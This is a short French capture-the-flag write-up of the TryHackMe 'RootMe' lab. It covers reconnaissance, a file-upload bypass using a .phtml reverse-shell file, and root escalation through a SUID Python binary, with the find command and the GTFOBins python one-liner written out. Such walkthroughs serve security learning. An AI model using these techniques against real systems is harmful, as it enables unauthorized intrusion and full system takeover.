Writeup du challenge TryHackMe Rootme — upload de shell via extension .phtml et élévation via binaire Python SUID.
Reconnaissance
Nmap sur 10.10.82.73 : ports SSH (22) et HTTP (80) — Apache 2.4.29. Dirsearch révèle /panel/ comme répertoire d’upload caché.
Accès Initial — File Upload Bypass
Les uploads PHP directs sont bloqués. Contournement via extension .phtml :
# Upload form.phtml (reverse shell)
# Accès via /uploads/form.phtml
Shell obtenu, flag user récupéré dans user.txt.
Élévation de Privilèges
Identification d’un binaire SUID inhabituel :
find / -user root -perm /4000 2>/dev/null
# /usr/bin/python
Exploitation via GTFOBins :
python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
Root obtenu.
← retour aux articles